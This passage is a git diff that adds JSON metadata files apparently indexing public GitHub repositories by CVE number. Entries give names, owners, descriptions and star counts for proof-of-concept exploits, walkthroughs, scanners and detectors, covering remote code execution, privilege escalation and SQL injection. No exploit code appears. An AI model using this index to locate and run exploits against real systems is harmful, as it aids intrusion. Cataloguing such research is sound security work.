true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 484792908, + "name": "CVE-2022-26809-RCE", + "full_name": "oppongjohn\/CVE-2022-26809-RCE", + "owner": { + "login": "oppongjohn", + "id": 96750321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96750321?v=4", + "html_url": "https:\/\/github.com\/oppongjohn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oppongjohn\/CVE-2022-26809-RCE", + "description": "CVE-2022-26809-RCE", + "fork": false, + "created_at": "2022-04-23T16:01:44Z", + "updated_at": "2022-04-23T16:01:44Z", + "pushed_at": "2022-04-23T16:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 487542806, + "name": "CVE-2022-26809", + "full_name": "yuanLink\/CVE-2022-26809", + "owner": { + "login": "yuanLink", + "id": 16820130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16820130?v=4", + "html_url": "https:\/\/github.com\/yuanLink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuanLink\/CVE-2022-26809", + "description": null, + "fork": false, + "created_at": "2022-05-01T13:19:10Z", + "updated_at": "2024-10-21T10:38:19Z", + "pushed_at": "2022-05-25T00:57:52Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26809" + ], + "visibility": "public", + "forks": 27, + "watchers": 59, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 502920966, + "name": "PoC-CVE-2022-26809", + "full_name": "s1ckb017\/PoC-CVE-2022-26809", + "owner": { + "login": "s1ckb017", + "id": 1282305, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1282305?v=4", + "html_url": "https:\/\/github.com\/s1ckb017", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1ckb017\/PoC-CVE-2022-26809", + "description": "PoC for CVE-2022-26809, analisys and considerations are shown in the github.io.", + "fork": false, + "created_at": "2022-06-13T11:08:33Z", + "updated_at": "2024-10-28T17:42:42Z", + "pushed_at": "2022-06-18T13:53:53Z", + "stargazers_count": 108, + "watchers_count": 108, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 108, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 518520520, + "name": "FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp", + "full_name": "fuckjsonp\/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp", + "owner": { + "login": "fuckjsonp", + "id": 110118141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110118141?v=4", + "html_url": "https:\/\/github.com\/fuckjsonp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuckjsonp\/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp", + "description": "警惕 一种针对红队的新型溯源手段!", + "fork": false, + "created_at": "2022-07-27T15:48:19Z", + "updated_at": "2024-11-01T07:14:50Z", + "pushed_at": "2022-07-27T15:55:01Z", + "stargazers_count": 394, + "watchers_count": 394, + "has_discussions": false, + "forks_count": 83, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 83, + "watchers": 394, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 582285658, + "name": "Cve-2022-26809", + "full_name": "michealadams30\/Cve-2022-26809", + "owner": { + "login": "michealadams30", + "id": 113975732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113975732?v=4", + "html_url": "https:\/\/github.com\/michealadams30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michealadams30\/Cve-2022-26809", + "description": null, + "fork": false, + "created_at": "2022-12-26T10:36:29Z", + "updated_at": "2022-12-26T10:37:06Z", + "pushed_at": "2022-12-26T10:37:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26923.json b/2022/CVE-2022-26923.json new file mode 100644 index 0000000000..e0eb9ac539 --- /dev/null +++ b/2022/CVE-2022-26923.json @@ -0,0 +1,188 @@ +[ + { + "id": 491338151, + "name": "TryHackMe-CVE-2022-26923", + "full_name": "r1skkam\/TryHackMe-CVE-2022-26923", + "owner": { + "login": "r1skkam", + "id": 58542375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58542375?v=4", + "html_url": "https:\/\/github.com\/r1skkam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1skkam\/TryHackMe-CVE-2022-26923", + "description": "Walkthrough on the exploitation of CVE-2022-26923, a vulnerability in AD Certificate Services", + "fork": false, + "created_at": "2022-05-12T02:31:50Z", + "updated_at": "2022-08-12T08:03:36Z", + "pushed_at": "2022-05-12T03:24:04Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 492169187, + "name": "CVE-2022-26923_AD-Certificate-Services", + "full_name": "LudovicPatho\/CVE-2022-26923_AD-Certificate-Services", + "owner": { + "login": "LudovicPatho", + "id": 26960886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26960886?v=4", + "html_url": "https:\/\/github.com\/LudovicPatho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LudovicPatho\/CVE-2022-26923_AD-Certificate-Services", + "description": "The vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.", + "fork": false, + "created_at": "2022-05-14T09:27:06Z", + "updated_at": "2024-08-20T05:11:44Z", + "pushed_at": "2022-05-14T20:56:39Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 42, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 525955636, + "name": "CVE-2022-26923-Powershell-POC", + "full_name": "lsecqt\/CVE-2022-26923-Powershell-POC", + "owner": { + "login": "lsecqt", + "id": 102690672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102690672?v=4", + "html_url": "https:\/\/github.com\/lsecqt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsecqt\/CVE-2022-26923-Powershell-POC", + "description": "A powershell poc to load and automatically run Certify and Rubeus from memory.", + "fork": false, + "created_at": "2022-08-17T21:13:49Z", + "updated_at": "2024-11-21T05:59:54Z", + "pushed_at": "2022-08-17T21:25:20Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706016211, + "name": "PIGADVulnScanner", + "full_name": "evilashz\/PIGADVulnScanner", + "owner": { + "login": "evilashz", + "id": 50722929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50722929?v=4", + "html_url": "https:\/\/github.com\/evilashz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evilashz\/PIGADVulnScanner", + "description": "检测域内常见一把梭漏洞,包括:NoPac、ZeroLogon、CVE-2022-26923、PrintNightMare", + "fork": false, + "created_at": "2023-10-17T06:29:44Z", + "updated_at": "2024-11-20T09:00:48Z", + "pushed_at": "2023-10-23T04:47:11Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 724703848, + "name": "CVE-2022-26923", + "full_name": "Gh-Badr\/CVE-2022-26923", + "owner": { + "login": "Gh-Badr", + "id": 110426701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110426701?v=4", + "html_url": "https:\/\/github.com\/Gh-Badr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gh-Badr\/CVE-2022-26923", + "description": "A proof of concept exploiting CVE-2022-26923.", + "fork": false, + "created_at": "2023-11-28T16:13:36Z", + "updated_at": "2023-12-06T21:25:52Z", + "pushed_at": "2023-12-09T23:39:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850747240, + "name": "CVE-2022-26923", + "full_name": "Yowise\/CVE-2022-26923", + "owner": { + "login": "Yowise", + "id": 42322439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42322439?v=4", + "html_url": "https:\/\/github.com\/Yowise", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yowise\/CVE-2022-26923", + "description": null, + "fork": false, + "created_at": "2024-09-01T17:03:27Z", + "updated_at": "2024-09-01T17:04:54Z", + "pushed_at": "2024-09-01T17:04:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26927.json b/2022/CVE-2022-26927.json new file mode 100644 index 0000000000..6926beed06 --- /dev/null +++ b/2022/CVE-2022-26927.json @@ -0,0 +1,33 @@ +[ + { + "id": 492123301, + "name": "CVE-2022-26927", + "full_name": "CrackerCat\/CVE-2022-26927", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2022-26927", + "description": "A proof-of-concept font with a write-up attached.", + "fork": false, + "created_at": "2022-05-14T05:40:06Z", + "updated_at": "2022-06-12T22:37:29Z", + "pushed_at": "2022-05-14T04:12:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26937.json b/2022/CVE-2022-26937.json new file mode 100644 index 0000000000..b763bffd02 --- /dev/null +++ b/2022/CVE-2022-26937.json @@ -0,0 +1,103 @@ +[ + { + "id": 491231577, + "name": "CVE-2022-26937", + "full_name": "corelight\/CVE-2022-26937", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-26937", + "description": "A Zeek package to detect CVE-2022-26937, a vulnerability in the Network Lock Manager (NLM) protocol in Windows NFS server.", + "fork": false, + "created_at": "2022-05-11T18:36:45Z", + "updated_at": "2024-10-18T12:05:57Z", + "pushed_at": "2024-10-15T13:33:09Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 504359221, + "name": "CVE-2022-26937", + "full_name": "omair2084\/CVE-2022-26937", + "owner": { + "login": "omair2084", + "id": 18167139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18167139?v=4", + "html_url": "https:\/\/github.com\/omair2084", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omair2084\/CVE-2022-26937", + "description": "Windows Network File System Crash PoC", + "fork": false, + "created_at": "2022-06-17T01:42:55Z", + "updated_at": "2024-10-26T14:27:08Z", + "pushed_at": "2022-06-17T01:50:26Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 86, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 547457138, + "name": "CVE-2022-26937", + "full_name": "Malwareman007\/CVE-2022-26937", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-26937", + "description": "POC Of CVE-2022-26937", + "fork": false, + "created_at": "2022-10-07T18:08:09Z", + "updated_at": "2023-05-06T12:14:59Z", + "pushed_at": "2022-10-07T18:10:22Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26937", + "microsoft", + "network", + "poc", + "security", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26965.json b/2022/CVE-2022-26965.json new file mode 100644 index 0000000000..4ea55bdae6 --- /dev/null +++ b/2022/CVE-2022-26965.json @@ -0,0 +1,33 @@ +[ + { + "id": 674804496, + "name": "Pluck-Exploitation-by-skdevils", + "full_name": "SkDevilS\/Pluck-Exploitation-by-skdevils", + "owner": { + "login": "SkDevilS", + "id": 112902431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112902431?v=4", + "html_url": "https:\/\/github.com\/SkDevilS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SkDevilS\/Pluck-Exploitation-by-skdevils", + "description": "# Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated) # Date: 13.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https:\/\/github.com\/pluck-cms\/pluck # Version: 4.7.16 # Tested on Ubuntu 20.04.3 LTS # CVE: CVE-2022-26965 ", + "fork": false, + "created_at": "2023-08-04T20:32:08Z", + "updated_at": "2023-08-08T16:30:42Z", + "pushed_at": "2023-08-08T16:30:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27134.json b/2022/CVE-2022-27134.json new file mode 100644 index 0000000000..56b59acb86 --- /dev/null +++ b/2022/CVE-2022-27134.json @@ -0,0 +1,33 @@ +[ + { + "id": 468680773, + "name": "CVE-batdappboomx", + "full_name": "Kenun99\/CVE-batdappboomx", + "owner": { + "login": "Kenun99", + "id": 43341053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43341053?v=4", + "html_url": "https:\/\/github.com\/Kenun99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kenun99\/CVE-batdappboomx", + "description": "CVE-2022-27134", + "fork": false, + "created_at": "2022-03-11T09:09:19Z", + "updated_at": "2022-05-12T05:54:24Z", + "pushed_at": "2022-05-12T05:54:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27226.json b/2022/CVE-2022-27226.json new file mode 100644 index 0000000000..2caf8f0f72 --- /dev/null +++ b/2022/CVE-2022-27226.json @@ -0,0 +1,38 @@ +[ + { + "id": 470691866, + "name": "ez-iRZ", + "full_name": "SakuraSamuraii\/ez-iRZ", + "owner": { + "login": "SakuraSamuraii", + "id": 90020213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90020213?v=4", + "html_url": "https:\/\/github.com\/SakuraSamuraii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SakuraSamuraii\/ez-iRZ", + "description": "Exploit for CVE-2022-27226", + "fork": false, + "created_at": "2022-03-16T17:45:12Z", + "updated_at": "2024-08-08T07:11:36Z", + "pushed_at": "2022-03-19T00:55:07Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-27226", + "cves", + "exploits", + "sakurasamuraii" + ], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27251.json b/2022/CVE-2022-27251.json new file mode 100644 index 0000000000..791c794679 --- /dev/null +++ b/2022/CVE-2022-27251.json @@ -0,0 +1,33 @@ +[ + { + "id": 471809392, + "name": "CVE-2022-27251", + "full_name": "TheCyberGeek\/CVE-2022-27251", + "owner": { + "login": "TheCyberGeek", + "id": 52138157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52138157?v=4", + "html_url": "https:\/\/github.com\/TheCyberGeek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberGeek\/CVE-2022-27251", + "description": "Remote Code Execution in LocalStack 0.12.6", + "fork": false, + "created_at": "2022-03-19T20:49:56Z", + "updated_at": "2022-03-20T10:42:14Z", + "pushed_at": "2022-03-19T21:01:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27254.json b/2022/CVE-2022-27254.json new file mode 100644 index 0000000000..7762292173 --- /dev/null +++ b/2022/CVE-2022-27254.json @@ -0,0 +1,33 @@ +[ + { + "id": 473238446, + "name": "CVE-2022-27254", + "full_name": "nonamecoder\/CVE-2022-27254", + "owner": { + "login": "nonamecoder", + "id": 5160055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5160055?v=4", + "html_url": "https:\/\/github.com\/nonamecoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nonamecoder\/CVE-2022-27254", + "description": "PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254)", + "fork": false, + "created_at": "2022-03-23T15:03:09Z", + "updated_at": "2024-08-31T13:53:02Z", + "pushed_at": "2022-03-26T05:52:15Z", + "stargazers_count": 453, + "watchers_count": 453, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 55, + "watchers": 453, + "score": 0, + "subscribers_count": 20 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27255.json b/2022/CVE-2022-27255.json new file mode 100644 index 0000000000..c5a96058fa --- /dev/null +++ b/2022/CVE-2022-27255.json @@ -0,0 +1,70 @@ +[ + { + "id": 511232241, + "name": "cve-2022-27255", + "full_name": "infobyte\/cve-2022-27255", + "owner": { + "login": "infobyte", + "id": 4226354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4226354?v=4", + "html_url": "https:\/\/github.com\/infobyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infobyte\/cve-2022-27255", + "description": null, + "fork": false, + "created_at": "2022-07-06T17:29:04Z", + "updated_at": "2024-11-13T06:21:54Z", + "pushed_at": "2022-08-30T13:23:51Z", + "stargazers_count": 277, + "watchers_count": 277, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 277, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 529630669, + "name": "CVE-2022-27255-checker", + "full_name": "stryker-project\/CVE-2022-27255-checker", + "owner": { + "login": "stryker-project", + "id": 93190160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93190160?v=4", + "html_url": "https:\/\/github.com\/stryker-project", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stryker-project\/CVE-2022-27255-checker", + "description": "Simple checker for CVE-2022-27255 using poc_crash and telnet availability", + "fork": false, + "created_at": "2022-08-27T15:56:44Z", + "updated_at": "2024-11-12T02:23:20Z", + "pushed_at": "2022-08-29T09:44:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve", + "exploit", + "poc", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27413.json b/2022/CVE-2022-27413.json new file mode 100644 index 0000000000..d9bf764df3 --- /dev/null +++ b/2022/CVE-2022-27413.json @@ -0,0 +1,33 @@ +[ + { + "id": 471061868, + "name": "CVE-2022-27413", + "full_name": "HH1F\/CVE-2022-27413", + "owner": { + "login": "HH1F", + "id": 101170679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101170679?v=4", + "html_url": "https:\/\/github.com\/HH1F", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HH1F\/CVE-2022-27413", + "description": null, + "fork": false, + "created_at": "2022-03-17T16:37:49Z", + "updated_at": "2022-11-09T16:15:07Z", + "pushed_at": "2022-03-18T14:39:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27414.json b/2022/CVE-2022-27414.json new file mode 100644 index 0000000000..5ff1243ac3 --- /dev/null +++ b/2022/CVE-2022-27414.json @@ -0,0 +1,33 @@ +[ + { + "id": 554482216, + "name": "CVE-2022-27414", + "full_name": "lus33rr\/CVE-2022-27414", + "owner": { + "login": "lus33rr", + "id": 84886384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84886384?v=4", + "html_url": "https:\/\/github.com\/lus33rr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lus33rr\/CVE-2022-27414", + "description": "Exploit of College Website v1.0 CMS - SQL injection", + "fork": false, + "created_at": "2022-10-19T22:17:47Z", + "updated_at": "2024-08-12T20:27:54Z", + "pushed_at": "2022-10-20T02:01:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27434.json b/2022/CVE-2022-27434.json new file mode 100644 index 0000000000..1021ddeed6 --- /dev/null +++ b/2022/CVE-2022-27434.json @@ -0,0 +1,33 @@ +[ + { + "id": 489789740, + "name": "CVE-2022-27434", + "full_name": "LongWayHomie\/CVE-2022-27434", + "owner": { + "login": "LongWayHomie", + "id": 63229183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4", + "html_url": "https:\/\/github.com\/LongWayHomie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2022-27434", + "description": "UNIT4 TETA Mobile Edition 29HF13 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page.", + "fork": false, + "created_at": "2022-05-07T21:57:15Z", + "updated_at": "2022-08-05T05:30:00Z", + "pushed_at": "2022-05-07T22:09:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27438.json b/2022/CVE-2022-27438.json new file mode 100644 index 0000000000..ce39a845dc --- /dev/null +++ b/2022/CVE-2022-27438.json @@ -0,0 +1,33 @@ +[ + { + "id": 498653861, + "name": "cve-2022-27438", + "full_name": "gerr-re\/cve-2022-27438", + "owner": { + "login": "gerr-re", + "id": 92781905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92781905?v=4", + "html_url": "https:\/\/github.com\/gerr-re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gerr-re\/cve-2022-27438", + "description": null, + "fork": false, + "created_at": "2022-06-01T08:33:16Z", + "updated_at": "2023-01-13T08:39:20Z", + "pushed_at": "2023-01-13T08:39:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27499.json b/2022/CVE-2022-27499.json new file mode 100644 index 0000000000..5e0db400b7 --- /dev/null +++ b/2022/CVE-2022-27499.json @@ -0,0 +1,39 @@ +[ + { + "id": 445389358, + "name": "snapshot-attack-demo", + "full_name": "StanPlatinum\/snapshot-attack-demo", + "owner": { + "login": "StanPlatinum", + "id": 7992257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7992257?v=4", + "html_url": "https:\/\/github.com\/StanPlatinum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StanPlatinum\/snapshot-attack-demo", + "description": "CVE-2022-27499", + "fork": false, + "created_at": "2022-01-07T03:45:41Z", + "updated_at": "2024-04-09T14:45:26Z", + "pushed_at": "2023-01-16T14:30:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-27499", + "intel", + "intel-sgx", + "intel-sgx-sdk" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27502.json b/2022/CVE-2022-27502.json new file mode 100644 index 0000000000..a72bcd89ee --- /dev/null +++ b/2022/CVE-2022-27502.json @@ -0,0 +1,38 @@ +[ + { + "id": 553393223, + "name": "CVE-2022-27502", + "full_name": "alirezac0\/CVE-2022-27502", + "owner": { + "login": "alirezac0", + "id": 32331449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32331449?v=4", + "html_url": "https:\/\/github.com\/alirezac0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alirezac0\/CVE-2022-27502", + "description": "Exploit of RealVNC VNC Server", + "fork": false, + "created_at": "2022-10-18T06:31:21Z", + "updated_at": "2024-08-12T20:27:52Z", + "pushed_at": "2022-10-18T07:05:36Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-27502", + "dll-hijacking", + "privilege-escalation", + "windows" + ], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27518.json b/2022/CVE-2022-27518.json new file mode 100644 index 0000000000..edb17648dc --- /dev/null +++ b/2022/CVE-2022-27518.json @@ -0,0 +1,33 @@ +[ + { + "id": 590162168, + "name": "CVE-2022-27518_POC", + "full_name": "dolby360\/CVE-2022-27518_POC", + "owner": { + "login": "dolby360", + "id": 22151399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22151399?v=4", + "html_url": "https:\/\/github.com\/dolby360", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dolby360\/CVE-2022-27518_POC", + "description": "A POC on how to exploit CVE-2022-27518 ", + "fork": false, + "created_at": "2023-01-17T19:40:04Z", + "updated_at": "2024-06-21T00:10:42Z", + "pushed_at": "2023-01-18T19:48:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27646.json b/2022/CVE-2022-27646.json new file mode 100644 index 0000000000..4268b3f8db --- /dev/null +++ b/2022/CVE-2022-27646.json @@ -0,0 +1,41 @@ +[ + { + "id": 648047567, + "name": "netgear_r6700v3_circled", + "full_name": "cyber-defence-campus\/netgear_r6700v3_circled", + "owner": { + "login": "cyber-defence-campus", + "id": 117660722, + "avatar_url": 